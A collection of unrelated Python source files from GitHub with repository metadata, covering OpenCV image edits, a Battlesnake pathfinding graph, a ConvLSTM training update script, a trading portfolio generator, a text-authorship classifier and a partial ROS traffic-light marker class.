kernel = np.ones((5,5),np.uint8)
#change image look
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) #note: opencv uses BGR by default
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0) # (7,7) is kernal size, must be odd number
imgCanny = cv2.Canny(imgGray,100,100) #edge detection
imgDialated = cv2.dilate(imgCanny,kernel,iterations=1) #join edges, more iterations more thick lines
imgEroded = cv2.erode(imgDialated,kernel,iterations = 1) #opposite of dialate
cv2.imshow('gray lena',imgGray)
cv2.imshow('blured lena',imgBlur)
cv2.imshow('edgy lena',imgCanny)
cv2.imshow('edgy dialated lena',imgDialated)
cv2.imshow('edgy dialated eroded lena',imgEroded)
cv2.waitKey(0)
#resize and crop
img = cv2.imread(r'resources\megumin_chibi.jpg')
img_shape = img.shape
print(img_shape)
imgResized = cv2.resize(img,(img_shape[0]//2,img_shape[1]//2))
imgCropped = imgResized[0:250,0:500] #note: order is height,width
print(imgResized.shape)
cv2.imshow('megubig',img)
cv2.imshow('megusmall',imgResized)
cv2.imshow('meguhat',imgCropped)
cv2.waitKey(0)
#warpPerspective
img = cv2.imread('resources/deathnote.jpg')
width,height = 224,300
pts1 = np.float32([[2,56],[111,11],[225,134],[112,193]])
pts2 = np.float32([[0,0],[width,0],[width,height],[0,height]])
tmatrix = cv2.getPerspectiveTransform(pts1,pts2) #<class 'numpy.ndarray'>, transformation matrix
print(tmatrix.shape)
imgOutput = cv2.warpPerspective(img,tmatrix,(width,height))
cv2.imshow('image',img)
cv2.imshow('imageWarped',imgOutput)
cv2.waitKey(0)
#stack images
img = cv2.imread(r'resources\naruto_shadow.jpg')
print(img.shape)
imgHor = np.hstack((img,img))
imgVer = np.vstack((img,img))
imgStacked = stack_images([[img,img,img],[img,img,img]],0.5)
cv2.imshow('Hshadow_clones',imgHor)
cv2.imshow('Vshadow_clones',imgVer)
cv2.imshow('shadow_clones',imgStacked)
cv2.waitKey(0)
| akshaysmin/opencv-practice | chapter2_pic_edits.py | chapter2_pic_edits.py | py | 2,003 | python | en | code | 0 | github-code | 13 |
39111335736 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import setuptools
with open('README.rst') as f:
long_description = f.read()
setuptools.setup(
name='sportsref',
version='1.0.0',
description='Sports reference scraper',
long_description=long_description,
author='J. Scott Moreland',
author_email='morelandjs@gmail.com',
url='https://github.com/sports_reference.git',
license='MIT',
packages=['sportsref'],
)
| morelandjs/sportsref | setup.py | setup.py | py | 446 | python | en | code | 1 | github-code | 13 |
22544362898 | r, g, b = map(int, input().split())
result = 0
for i in range(r):
for j in range(g):
for k in range(b):
print(i, j, k)
result += 1
print(result)
# print(r * g * b) result 선언 없이 이렇게 가능 | WeeYoungSeok/python_coding_study | codeup_100/problem_83.py | problem_83.py | py | 240 | python | en | code | 0 | github-code | 13 |
42648379172 | """A graph used for A* pathfinding"""
class Graph(object):
"""Class representing a Graph"""
inaccessible_nodes = []
width = -1
height = -1
def __init__(self):
return
def init(self, width, height):
"""Initializes the graph"""
self.width = width
self.height = height
def update(self, blackboard):
"""Updates graph based on blackboard data"""
self.inaccessible_nodes = []
snakes = blackboard['snakes']
for snake in snakes:
coords = snake['coords']
for index in range(len(coords) - 1):
coord = coords[index]
x_coord = coord[0]
y_coord = coord[1]
self.inaccessible_nodes.append((x_coord, y_coord))
def neighbors(self, node):
"""Returns a list of neighbors of the parameter node"""
directions = [[1, 0], [0, 1], [-1, 0], [0, -1]]
results = []
for direction in directions:
neighbor = (node[0] + direction[0], node[1] + direction[1])
if self.is_node_in_bounds(node) and neighbor not in self.inaccessible_nodes:
results.append(neighbor)
return results
def cost(self, node_1, node_2):
"""Returns cost of navigating between two nodes"""
(x_coord_1, y_coord_1) = node_1
(x_coord_2, y_coord_2) = node_2
return abs(x_coord_1 - x_coord_2) + abs(y_coord_1 - y_coord_2)
def farthest_node(self, node_1):
"""Get a farthest point given a node"""
nodes = self.__flood_fill(node_1)
highest_cost_node = (-1, -1)
highest_cost = -1
for node_2 in nodes:
cost = self.cost(node_1, node_2)
if cost > highest_cost:
highest_cost_node = node_2
highest_cost = cost
return highest_cost_node
def __flood_fill(self, node):
"""Flood fills based on current node"""
directions = [[1, 0], [0, 1], [-1, 0], [0, -1]]
results = [node]
nodes = [node]
while len(nodes) > 0:
eval_node = nodes.pop()
for direction in directions:
neighbor = (eval_node[0] + direction[0], eval_node[1] + direction[1])
if (
neighbor not in results
and self.is_node_in_bounds(neighbor)
and neighbor not in self.inaccessible_nodes
):
results.append(neighbor)
nodes.append(neighbor)
return results
def is_node_in_bounds(self, node):
"""Make sure node is in bounds"""
(x_coord, y_coord) = node
if x_coord < 0 or x_coord >= self.width:
return False
elif y_coord < 0 or y_coord >= self.height:
return False
else:
return True
| dlsteuer/battlesnake | snake/Graph.py | Graph.py | py | 2,891 | python | en | code | 0 | github-code | 13 |
72338009939 | import os
import argparse
import random
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import mean_squared_error, mean_absolute_error
from model import ConvLSTMModel
from update_build_dataloader import get_dataloader
def return_perf(y_true, y_pred):
mse = mean_squared_error(y_true, y_pred)
mae = mean_absolute_error(y_true, y_pred)
mape = np.mean(np.abs((y_true - y_pred) / y_true)) * 100
return mse, mae, mape
def main(args):
# Log files
if args.use_total_phase:
folder_name = 'result_source_total_phase'
folder_name += '_split_{}'.format(args.img_split_type)
source_data = 'total_phase'
else:
if args.use_time_phase:
folder_name = 'result_source_time_phase'
folder_name += '_split_{}'.format(args.img_split_type)
source_data = 'time_phase'
else:
folder_name = 'result_source_'
if args.use_weather_1:
folder_name += '1'
if args.use_weather_4:
folder_name += '4'
folder_name += '_split_{}_seed_{}'.format(args.img_split_type, args.iid)
source_data = folder_name.split('source_')[-1].split('_split')[0]
save_path = os.path.join(args.save_root_path, folder_name, f'time_{args.use_time_phase}')
os.makedirs(save_path, exist_ok=True)
inference_result = open(os.path.join(save_path, 'inference_result.txt'), 'w')
update_log_loss = open(os.path.join(save_path, 'update_log_loss.txt'), 'w')
# -------------------------------
# LOAD PRETRAINED MODEL
# -------------------------------
model = ConvLSTMModel(args.mem_size, args.img_split_type)
for i in range(1,6):
model.load_state_dict(torch.load(os.path.join(save_path, 'best_model.pt')))
model.cuda()
print('[Data Block {}th]'.format(i))
tst_loader = get_dataloader(
args.brave_csv_path, args.brave_root_img_path, args.use_time_phase,
args.img_split_type, args.batch_size, args.use_total_phase, use_prediction = False, group_num = i, save_path = None
)
# -------------------------------
# INFERENCE WITH PRETRAINED MODEL
# -------------------------------
data_loaders = {'new_brave': tst_loader}
results = {
'new_brave': {'trues': np.array([]), 'preds': np.array([])}
}
print('==> Start Testing')
for target_data in data_loaders:
model.eval()
with torch.no_grad():
for inputs, targets in data_loaders[target_data]:
inputs = inputs.cuda()
outputs = model(inputs)
results[target_data]['trues'] = np.r_[results[target_data]['trues'], targets.numpy()]
results[target_data]['preds'] = np.r_[results[target_data]['preds'], outputs.detach().cpu().numpy().squeeze(1)]
mse, mae, mape = return_perf(results[target_data]['trues'], results[target_data]['preds'])
print('Source: {} & Target: {}'.format(source_data, target_data))
print('Test MSE: {:.4f}, MAE: {:.4f}, MAPE: {:.4f}\n'.format(mse, mae, mape))
inference_result.write('[{}th data block] Test MSE: {:.4f}, MAE: {:.4f}, MAPE: {:.4f}\n'.format(i-1, mse, mae, mape))
result = pd.DataFrame()
result['true'] = list(results[target_data]['trues'])
result['pred'] = list(results[target_data]['preds'])
if args.use_total_phase:
file_name = 'result_source_target_total_phase_beforeupdate{}th.csv'.format(i)
else:
file_name = 'result_source_{}_target_{}_beforeupdate{}th.csv'.format(source_data, target_data.split('_')[-1], i)
result.to_csv(os.path.join(save_path, file_name), index=False)
# -------------------------------
# UPDATE MODEL WITH DATA BLOCK
# -------------------------------
print('==> Start Updating')
new_loader = get_dataloader(
args.brave_csv_path, args.brave_root_img_path, args.use_time_phase,
args.img_split_type, args.batch_size, args.use_total_phase, group_num = i, use_prediction = True, save_path = save_path
)
criterion = nn.MSELoss()
optimizer = torch.optim.RMSprop(model.parameters(), lr=args.lr)
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, args.step_size, args.decay_rate)
best_loss = 10000
for epoch in range(args.num_epochs): # EPOCH: 5
print('==> Start Epoch = {}'.format(epoch + 1))
epoch_loss = 0
for i, (inputs, targets) in enumerate(new_loader):
inputs = inputs.cuda()
targets = targets.cuda()
outputs = model(inputs)
loss = criterion(outputs, targets.unsqueeze(1))
optimizer.zero_grad()
loss.backward()
optimizer.step()
epoch_loss += loss.item()
if (i + 1) % 200 == 0:
print('Epoch: [{}][{}/{}]\t\t'
'Loss: {}\t\t'.format(epoch + 1, i + 1, len(new_loader), loss.item()))
avg_loss = epoch_loss / len(new_loader)
print('\nUpdating: Loss = {}'.format(avg_loss))
update_log_loss.write('Updating loss after {} epoch = {}\n'.format(epoch + 1, avg_loss))
torch.save(model.state_dict(), os.path.join(save_path, 'best_model.pt'))
lr_scheduler.step()
inference_result.close()
update_log_loss.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
parser.add_argument('--num-epochs', type=int, default=5, help='Number of epochs')
parser.add_argument('--lr', type=float, default=1e-4, help='Learning rate')
parser.add_argument('--step-size', type=int, default=10, help='Learning rate decay step')
parser.add_argument('--decay-rate', type=float, default=0.5, help='Learning rate decay rate')
parser.add_argument('--mem-size', type=int, default=256, help='ConvLSTM hidden state size')
parser.add_argument('--save-root-path', type=str, default='./result')
parser.add_argument('--batch-size', type=int, default=16, help='Training batch size')
parser.add_argument('--iid', type=int, default=0)
parser.add_argument('--img_split_type', type=int, default=0,
help='0: img to 3 frames vertically | 1: img to 5 frames vertically | 2: img to 3 frames horizontally')
parser.add_argument('--use-weather-1', type=bool, default=False)
parser.add_argument('--use-weather-4', type=bool, default=False)
parser.add_argument('--use-brave', type=bool, default=True)
parser.add_argument('--use-total-phase', type=bool, default=False)
parser.add_argument('--use-time-phase', type=bool, default=True)
parser.add_argument('--weather-1-csv-path', type=str,
default='/media/heejeong/HDD2/project/daewoo/data/weather_1/wave_radar/weather_1_data_label_seed.csv',
help='Csv file directory of labels for weather1')
parser.add_argument('--weather-1-root-img-path', type=str,
default='/media/heejeong/HDD2/project/daewoo/data/weather_1/data_crop/',
help='Csv file directory of labels for weather1')
parser.add_argument('--weather-4-csv-path', type=str,
default='/media/heejeong/HDD2/project/daewoo/data/weather_4/wave_radar/weather_4_data_label_seed.csv',
help='Csv file directory of labels for weather4')
parser.add_argument('--weather-4-root-img-path', type=str,
default='/media/heejeong/HDD2/project/daewoo/data/weather_4/data_crop/',
help='Folder directory of images for weather4')
parser.add_argument('--weather-total-phase-csv-path', type=str,
default='/media/heejeong/HDD2/project/daewoo/data/weather_1_4_data_label_seed.csv',
help='Csv file directory of labels for weather1&4')
parser.add_argument('--brave-csv-path', type=str,
default='../preprocessing/brave_data_label.csv')
parser.add_argument('--brave-root-img-path', type=str,
default='/mnt/C83AFA0C3AF9F6F2/hyundai_brave/crop_data/')
args, _ = parser.parse_known_args()
main(args)
| lepoeme20/daewoo | convlstm/update.py | update.py | py | 8,668 | python | en | code | 0 | github-code | 13 |
21571728736 | import params
from google.cloud import datastore, storage, logging
import time
import pickle
import hashlib
import sys
import numpy as np
import portfolioGeneration
import portfolio
import dataAck
import warnings
import numpy as np
import pandas as pd
warnings.filterwarnings("ignore")
import multiprocessing as mp
def generateAllReturnsFromCache(allModels):
aggregateReturns = None
aggregatePredictions = None
aggregateSlippageReturns = None
cleanedModels = []
for mod in allModels:
try:
algoReturn, algoPredictions, algoSlippageAdjustedReturn = dataAck.getModelData(mod)
print(mod.describe())
algoReturn.columns = [str(mod.describe())]
algoPredictions.columns = [str(mod.describe())]
algoSlippageAdjustedReturn.columns = [str(mod.describe())]
if aggregateReturns is None:
aggregateReturns = algoReturn
aggregatePredictions = algoPredictions
aggregateSlippageReturns = algoSlippageAdjustedReturn
else:
aggregateReturns = aggregateReturns.join(algoReturn)
aggregatePredictions = aggregatePredictions.join(algoPredictions)
aggregateSlippageReturns = aggregateSlippageReturns.join(algoSlippageAdjustedReturn)
cleanedModels.append(mod)
except:
print("SKIPPING", mod.describe())
return aggregateReturns, aggregatePredictions, aggregateSlippageReturns, cleanedModels
def computeReturnsForUniqueModelsCache(uniqueModels, factorToTrade):
tickersRequired = []
for mod in uniqueModels:
print(mod.describe())
if mod.inputSeries.targetTicker not in tickersRequired:
tickersRequired.append(mod.inputSeries.targetTicker)
if mod.inputSeries.series.ticker not in tickersRequired:
tickersRequired.append(mod.inputSeries.series.ticker)
if factorToTrade not in tickersRequired:
tickersRequired.append(factorToTrade)
pulledData, validTickers = dataAck.downloadTickerData(tickersRequired)
joinedData = dataAck.joinDatasets([pulledData[ticker] for ticker in pulledData])
modelReturns, modelPredictions, modelSlippageReturns, cleanedModels = generateAllReturnsFromCache(uniqueModels)
return cleanedModels, modelReturns, modelPredictions, modelSlippageReturns, modelReturns.join(dataAck.getDailyFactorReturn(factorToTrade, joinedData)).dropna(), joinedData
from google.cloud import datastore, storage, logging
import time
import params
import hashlib
def checkAggregatePredictionsStored(model):
while True:
try:
datastore_client = datastore.Client('money-maker-1236')
query = datastore_client.query(kind=params.aggregatePrediction)
query.add_filter('modelHash', '=', hashlib.sha224((str(model.describe())).encode('utf-8')).hexdigest())
retrievedPredictions = list(query.fetch(limit=1))
if len(retrievedPredictions) > 0:
return True
else:
return False
except:
time.sleep(10)
print("DATA SOURCE RETRIEVAL ERROR:", str(sys.exc_info()))
def runModPredictionBackfill(mod, dataToUse, backfillDays = 30):
##ENSURE POPULATED FOR CORRECT PREDICTION STYLE
pred = dataAck.computePosition([mod.makeTodayPrediction(dataToUse)])
print(mod.describe(), pred, dataToUse.index[-1])
portfolio.storeModelPrediction(mod, pred, dataToUse.index[-1])
def runBackfillMP(mod, joinedData, threadsToUse, backfillDays = 30):
mpEngine = mp.get_context('fork')
i = mod.inputSeries.predictionPeriod - 1 + backfillDays
runningP = []
while i > 0:
while len(runningP) > threadsToUse:
runningP = dataAck.cycleP(runningP)
p = mpEngine.Process(target=runModPredictionBackfill, args=(mod, joinedData[:-i], backfillDays, ))
p.start()
runningP.append(p)
i -= 1
while len(runningP) > 0:
runningP = dataAck.cycleP(runningP)
print("CHECKING AGGREGATE PREDICTIONS")
##STORE AGGREGATE PREDICTIONS
i = mod.inputSeries.predictionPeriod - 1 + backfillDays
allPreds = portfolio.getPredictionsByModel(mod)
while i > 0:
lastDay = joinedData[:-i].index[-1]
todayPredictions = []
for pred in allPreds:
##CHECK IF PREDICTION STILL VALID
if len(joinedData[str(pred["lastDataDayUsed"]):lastDay]) - 1 < pred["predictionLength"] and len(joinedData[str(pred["lastDataDayUsed"]):lastDay]) > 0:##GETS TRADING DAYS SINCE LAST DATA DAY
todayPredictions.append(pred["prediction"])
##SKIP UPLOAD IF NOT ENOUGH PREDICTIONS
print(lastDay, len(todayPredictions))
if len(todayPredictions) == mod.inputSeries.predictionPeriod:
pred = dataAck.computePosition(todayPredictions)
print(mod.describe(), todayPredictions, pred)
portfolio.storeAggregateModelPrediction(mod, pred, lastDay)
i -= 1
def returnSelectAlgos(algoColumns):
return np.random.choice(algoColumns, size=random.randint(7, len(algoColumns)), replace= False)
# import matplotlib.pyplot as plt
import time
import random
def performPortfolioPerformanceEstimation(thisPredictions, thisReturns, hashToModel, joinedData):
hrpReturns, historicalWeights = portfolioGeneration.\
produceHRPPredictions(thisReturns,\
126, startIndex=None, maxWindowSize=False)
print("COMPUTED HISTORICAL WEIGHTS")
modelsUsed = []
tickersSeen = {}
for modelHash in thisPredictions.columns:
thisModel = hashToModel[modelHash]
modelsUsed.append(thisModel)
print(thisModel.describe())
if thisModel.inputSeries.targetTicker not in tickersSeen:
tickersSeen[thisModel.inputSeries.targetTicker] = 0
tickersSeen[thisModel.inputSeries.targetTicker] += 1
##STORE MODEL
portfolioHash = portfolioGeneration.storePortfolio(modelsUsed,\
description=str(tickersSeen), benchmark="SPY", portfolioType="HRP FULL")
portfolioGeneration.storeHistoricalAllocations(portfolioHash, \
modelsUsed, historicalWeights, thisPredictions)
portfolioInfo = portfolio.getPortfolioByKey(portfolioHash)
portfolioInfo = {
"key":portfolioInfo.key.name,
"description":portfolioInfo["description"],
"benchmark":portfolioInfo["benchmark"],
"portfolioType":portfolioInfo["portfolioType"],
"startedTrading":portfolioInfo["startedTrading"]
}
print(portfolioInfo)
portfolioData = portfolioGeneration.getDataForPortfolio(portfolioHash, portfolioInfo["benchmark"], joinedData, portfolioInfo["startedTrading"])
portfolioGeneration.cachePortfolio(portfolioInfo, portfolioData, params.AVAILABLE_MODE)
## MP RUN
def createPossiblePortfoliosMP(cleanedPredictions, cleanedReturns, hashToModel, joinedData, threadsToUse):
mpEngine = mp.get_context('fork')
runningP = []
while True:
selectedAlgorithms = returnSelectAlgos(cleanedReturns.columns)
while len(runningP) > threadsToUse:
runningP = dataAck.cycleP(runningP)
p = mpEngine.Process(target=performPortfolioPerformanceEstimation, args=(cleanedPredictions[selectedAlgorithms], cleanedReturns[selectedAlgorithms], hashToModel, joinedData, ))
p.start()
runningP.append(p)
| SignalBuilders/walkforwardTrader | autoPortfolio.py | autoPortfolio.py | py | 7,694 | python | en | code | 1 | github-code | 13 |
27194590006 | # Url Shortner
import streamlit as st
import pyshorteners
import clipboard
def shorten_url(url):
shortener = pyshorteners.Shortener()
short_url = shortener.tinyurl.short(url)
return short_url
# Streamlit app
st.title("URL Shortener")
url_to_shorten = st.text_input("Enter the URL to shorten")
# Button to shorten the URL
if st.button("Shorten"):
if url_to_shorten:
shortened_url = shorten_url(url_to_shorten)
clipboard.copy(shortened_url)
st.success("Shortened URL:")
st.write(shortened_url)
st.info("The shortened URL has been copied to the clipboard.")
else:
st.warning("Please enter a URL to shorten.")
| akashbagwan2308/Sync_Intern_Python | Task_3_URL_Shortner.py | Task_3_URL_Shortner.py | py | 705 | python | en | code | 0 | github-code | 13 |
72436265937 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 15:56:48 2020
@author: cartervandemoore
"""
#create an initial version of a TextModel class,
#which will serve as a blueprint for objects that model a body of text
import math
#returns a list of words after 'cleaning' out a string txt
def clean_text(txt):
txt=txt.lower()
txt=txt.replace('.', '')
txt=txt.replace(',', '')
txt=txt.replace('?', '')
txt=txt.replace('!', '')
txt=txt.replace(';', '')
txt=txt.replace(':', '')
txt=txt.replace('"', '')
lst_ans=txt.split(" ")
return lst_ans
#returns the stem / root of a given word
def stem(s):
if len(s)>4 and s[-1]=="s" and s[-3]!="ies":
s=s[:-1]
if len(s)>4 and s[:2]=="un":
s=s[2:]
elif len(s)>4 and s[:3]=="dis":
s=s[3:]
elif len(s)>4 and s[:3]=="non":
s=s[3:]
elif len(s)>4 and s[:3]=="mis":
s=s[3:]
if len(s)>5 and s[-3:] == 'ing':
if s[-4] == s[-5] and s[-4]!="l":
s = s[:-4]
elif s[-4] == s[-5] and s[-4]=="l":
s = s[:-3]
else:
s = s[:-3]
elif s[-2:] == 'er':
if(len(s[:-2])==4):
s = s[:-2]
else:
s = s[:-3]
elif len(s)>4 and s[-3:] == 'ies':
s=s[:-3]
s=s+"y"
return s
#returns the similarity score of two dictionaries
def compare_dictionaries(d1, d2):
score=0
total=0
for key in d1:
total+=d1[key]
if total==0 or total==1:
total=1.01
for key in d2:
if key in d1:
score+=d2[key]*math.log(d1[key]/total)
else:
score+=d2[key]*math.log(.5/total)
return score
class TextModel():
#Constructor
def __init__(self, model_name):
self.name=model_name
self.words={}
self.word_lengths={}
self.stems={}
self.sentence_lengths={}
self.conjunctions={}
def __repr__(self):
"""Return a string representation of the TextModel."""
s = 'text model name: ' + self.name + '\n'
s += ' number of words: ' + str(len(self.words)) + '\n'
s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\n'
s += ' number of stems: ' + str(len(self.stems)) + '\n'
s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\n'
s += ' the number of coordinating conjunctions is: ' + str(len(self.conjunctions)) + '\n'
return s
def add_string(self, s):
"""Analyzes the string txt and adds its pieces
to all of the dictionaries in this text model."""
s_length=1
for c in s:
if c==" ":
s_length+=1
elif "." in c or "!" in c or "?" in c:
if s_length not in self.sentence_lengths:
self.sentence_lengths[s_length]=1
else:
self.sentence_lengths[s_length]+=1
s_length=0
word_list=clean_text(s)
for w in word_list:
if w not in self.words:
self.words[w]=1
else:
self.words[w]+=1
if len(w) not in self.word_lengths:
self.word_lengths[len(w)]=1
else:
self.word_lengths[len(w)]+=1
if stem(w) not in self.stems:
self.stems[stem(w)]=1
else:
self.stems[stem(w)]+=1
if w in "for and nor but or yet so":
if w not in self.conjunctions:
self.conjunctions[w]=1
else:
self.conjunctions[w]+=1
#adds all of the text in the file identified by filename to the model
def add_file(self, filename):
f = open(filename, 'r', encoding='utf8', errors='ignore')
text = f.read() # read it all in at once!
f.close()
self.add_string(text)
#saves the TextModel object self by writing its various
#feature dictionaries to files
def save_model(self):
d = self.words # Create a sample dictionary.
f = open(self.name + '_' + 'words', 'w') # Open file for writing.
f.write(str(d)) # Writes the dictionary to the file.
f.close() # Close the file.
d1 = self.word_lengths # Create a sample dictionary.
f = open(self.name + '_' + 'word_lengths', 'w') # Open file for writing.
f.write(str(d1)) # Writes the dictionary to the file.
f.close() # Close the file.
d2 = self.stems # Create a sample dictionary.
f = open(self.name + '_' + 'stems', 'w') # Open file for writing.
f.write(str(d2)) # Writes the dictionary to the file.
f.close()
d3 = self.sentence_lengths # Create a sample dictionary.
f = open(self.name + '_' + 'sentence_lengths', 'w') # Open file for writing.
f.write(str(d3)) # Writes the dictionary to the file.
f.close()
d4 = self.conjunctions # Create a sample dictionary.
f = open(self.name + '_' + 'conjunctions', 'w') # Open file for writing.
f.write(str(d4)) # Writes the dictionary to the file.
f.close()
#reads the stored dictionaries for the called TextModel object from their
#files and assigns them to the attributes of the called TextModel
def read_model(self):
f = open(self.name + '_' + 'words', 'r') # Open for reading.
d_str = f.read() # Read in a string that represents a dict.
f.close()
self.words = dict(eval(d_str)) # Convert the string to a dictionary.
f = open(self.name + '_' + 'word_lengths', 'r') # Open for reading.
d1_str = f.read() # Read in a string that represents a dict.
f.close()
self.word_lengths = dict(eval(d1_str)) # Convert the string to a dictionary.
f = open(self.name + '_' + 'stems', 'r') # Open for reading.
d2_str = f.read() # Read in a string that represents a dict.
f.close()
self.stems = dict(eval(d2_str)) # Convert the string to a dictionary.
f = open(self.name + '_' + 'sentence_lengths', 'r') # Open for reading.
d3_str = f.read() # Read in a string that represents a dict.
f.close()
self.sentence_lengths = dict(eval(d3_str)) # Convert the string to a dictionary.
f = open(self.name + '_' + 'conjunctions', 'r') # Open for reading.
d4_str = f.read() # Read in a string that represents a dict.
f.close()
self.conjunctions = dict(eval(d4_str)) # Convert the string to a dictionary.
#computes and returns a list of log similarity scores measuring the
#similarity of self and other – one score for each type of feature
#(words, word lengths, stems, sentence lengths, and your additional feature)
def similarity_scores(self, other):
list1=[compare_dictionaries(other.words, self.words)]
list2=[compare_dictionaries(other.word_lengths, self.word_lengths)]
list3=[compare_dictionaries(other.stems, self.stems)]
list4=[compare_dictionaries(other.sentence_lengths, self.sentence_lengths)]
list5=[compare_dictionaries(other.conjunctions, self.conjunctions)]
ans=list1+list2+list3+list4+list5
return ans
#compares the called TextModel object (self) to two other “sourceâ€
#TextModel objects (source1 and source2) and determines which of these
#other TextModels is the more likely source of the called TextModel
def classify(self, source1, source2):
scores1 = self.similarity_scores(source1)
scores2 = self.similarity_scores(source2)
print("scores for "+source1.name+": "+str(scores1))
print("scores for "+source2.name+": "+str(scores2))
total1=0
total2=0
for x in range(len(scores1)):
if scores1[x]>scores2[x]:
total1+=1
elif scores2[x]>scores1[x]:
total2+=1
if total1>total2:
print(str(self.name)+" is more likely to have come from "+str(source1.name))
else:
print(str(self.name)+" is more likely to have come from "+str(source2.name))
def test():
""" your docstring goes here """
source1 = TextModel('source1')
source1.add_string('It is interesting that she is interested.')
source2 = TextModel('source2')
source2.add_string('I am very, very excited about this!')
mystery = TextModel('mystery')
mystery.add_string('Is he interested? No, but I am.')
mystery.classify(source1, source2)
def run_tests():
""" your docstring goes here """
source1 = TextModel('TenthOfDecemberPart1')
source1.add_file('TenthOfDecemberPart1.txt')
source2 = TextModel('TheTellTaleHeartPart1')
source2.add_file('TheTellTaleHeartPart1.txt')
new1 = TextModel('TellTaleHeartPart2')
new1.add_file('TellTaleHeartPart2.txt')
new1.classify(source1, source2)
new2 = TextModel('TenthOfDecemberPart2')
new2.add_file('TenthOfDecemberPart2.txt')
new2.classify(source1, source2)
new3 = TextModel('TheRaven')
new3.add_file('TheRaven.txt')
new3.classify(source1, source2)
new4 = TextModel('HanselAndGretel')
new4.add_file('HanselAndGretel.txt')
new4.classify(source1, source2)
| cvmoore/authorFinder | TextMatching2.py | TextMatching2.py | py | 10,075 | python | en | code | 0 | github-code | 13 |
37630967052 | #! /usr/bin/env python3
import rospy
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
from geometry_msgs.msg import Point
import numpy as np
class Traffic_Light_Marker_Array:
def __init__(self, stopline=None):
self.mark_array = MarkerArray()
self.lights_attr = dict()
if stopline is None:
self.x = 0
self.y = 0
self.z = 0
self.unit_vector = (1,0,0)
else:
self.x = stopline[0]
self.y = stopline[1]
self.z = stopline[2]
stopline_vector = (stopline[3] - stopline[0], stopline[4] - stopline[1], stopline[5] - stopline[2])
self.unit_vector = stopline_vector / np.linalg.norm(stopline_vector)
#print(f"{self.unit_vector}")
#self.unit_vector = __getUnitVector(stopline[0], stopline[1],stopline[2],stopline[3], stopline[4],stopline[5])
self.light_radius = 1
self.light_pole_radius = 0.3
self.light_pole_hight = 10
self.light_pole = Point(self.x - self.light_pole_radius * self.unit_vector[0], self.y - self.light_pole_radius * self.unit_vector[1], self.z + (self.light_pole_hight / 2))
self.red_light = Point(
self.x + self.light_radius * self.unit_vector[0],
self.y + self.light_radius * self.unit_vector[1],
self.z + self.light_pole_hight + self.light_radius * self.unit_vector[2])
self.yellow_light = Point(
self.red_light.x + self.light_radius * self.unit_vector[0],
self.red_light.y + self.light_radius * self.unit_vector[1],
self.red_light.z + self.light_radius * self.unit_vector[2])
self.green_light = Point(
self.yellow_light.x + self.light_radius * self.unit_vector[0],
self.yellow_light.y + self.light_radius * self.unit_vector[1],
self.yellow_light.z + self.light_radius * self.unit_vector[2])
self.green_left = Point(
self.yellow_light.x + self.light_radius * self.unit_vector[0],
self.yellow_light.y + self.light_radius * self.unit_vector[1],
self.yellow_light.z + self.light_radius * self.unit_vector[2])
self.green_strait = Point(
self.green_left.x + self.light_radius * self.unit_vector[0],
self.green_left.y + self.light_radius * self.unit_vector[1],
self.green_left.z + self.light_radius * self.unit_vector[2])
self.green_right = Point(
self.green_strait.x + self.light_radius * self.unit_vector[0],
self.green_strait.y + self.light_radius * self.unit_vector[1],
self.green_strait.z + self.light_radius * self.unit_vector[2])
self.count_down = Point(
self.green_right.x + self.light_radius * self.unit_vector[0],
self.green_right.y + self.light_radius * self.unit_vector[1],
self.green_right.z + self.light_radius * self.unit_vector[2])
self.lights_attr["r"] = {"id": 1, "pose": self.red_light, "on": (1.0, 0.0, 0.0), "off": (0.3, 0.0, 0.0)}
self.lights_attr["y"] = {"id": 2, "pose": self.yellow_light, "on": (1.0, 1.0, 0.0), "off": (0.3, 0.3, 0.0)}
self.lights_attr["g"] = {"id": 3, "pose": self.green_light, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_l"] = {"id": 11, "pose": self.green_left, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_s"] = {"id": 12, "pose": self.green_strait, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_r"] = {"id": 13, "pose": self.green_right, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
'''
self.green_left = {
"x_tip": {"x": self.yellow_light["x"] + self.light_radius * 3, "y": self.y, "z": self.light_pole_hight},
"x_tail": {"x": self.yellow_light["x"] + self.light_radius, "y": self.y, "z": self.light_pole_hight}
}
self.green_straight = {
"x_tip": {"x": self.green_left["x_tip"]["x"] + self.light_radius * 2, "y": self.y, "z": self.light_pole_hight - self.light_radius},
"x_tail": {"x":self.green_left["x_tip"]["x"] + self.light_radius * 2, "y":self.y, "z": self.light_pole_hight + self.light_radius},
}
self.green_right = {
"x_tip": {"x": self.green_straight["x_tip"]["x"] + self.light_radius , "y": self.y, "z": self.light_pole_hight},
"x_tail": {"x":self.green_straight["x_tip"]["x"] + self.light_radius * 3, "y":self.y, "z": self.light_pole_hight},
}
'''
#self.count_down ={"x": self.green_right["x_tail"]["x"] + self.light_radius, "y": self.y, "z": self.light_pole_hight}
def __getUnitVector(self, x0, y0, x1, y1):
distance = ((x0 - x1)**2 + (y0 -y1)**2)**0.5
return ((x1 -x0)/distance, (y1 - y0)/distance)
def __draw_light_pole(self):
lampole = Marker()
lampole.header.frame_id = "/map"
lampole.header.stamp = rospy.Time.now()
lampole.type = 3
lampole.id = 6
# Set the scale of the marker
lampole.scale.x = self.light_pole_radius
lampole.scale.y = self.light_pole_radius
lampole.scale.z = self.light_pole_hight
# Set the color
lampole.color.r = 0.7
lampole.color.g = 0.7
lampole.color.b = 0.7
lampole.color.a = 1.0
# Set the pose of the marker
lampole.pose.position.x = self.light_pole.x
lampole.pose.position.y = self.light_pole.y
lampole.pose.position.z = self.light_pole.z
lampole.pose.orientation.x = 0.0
lampole.pose.orientation.y = 0.0
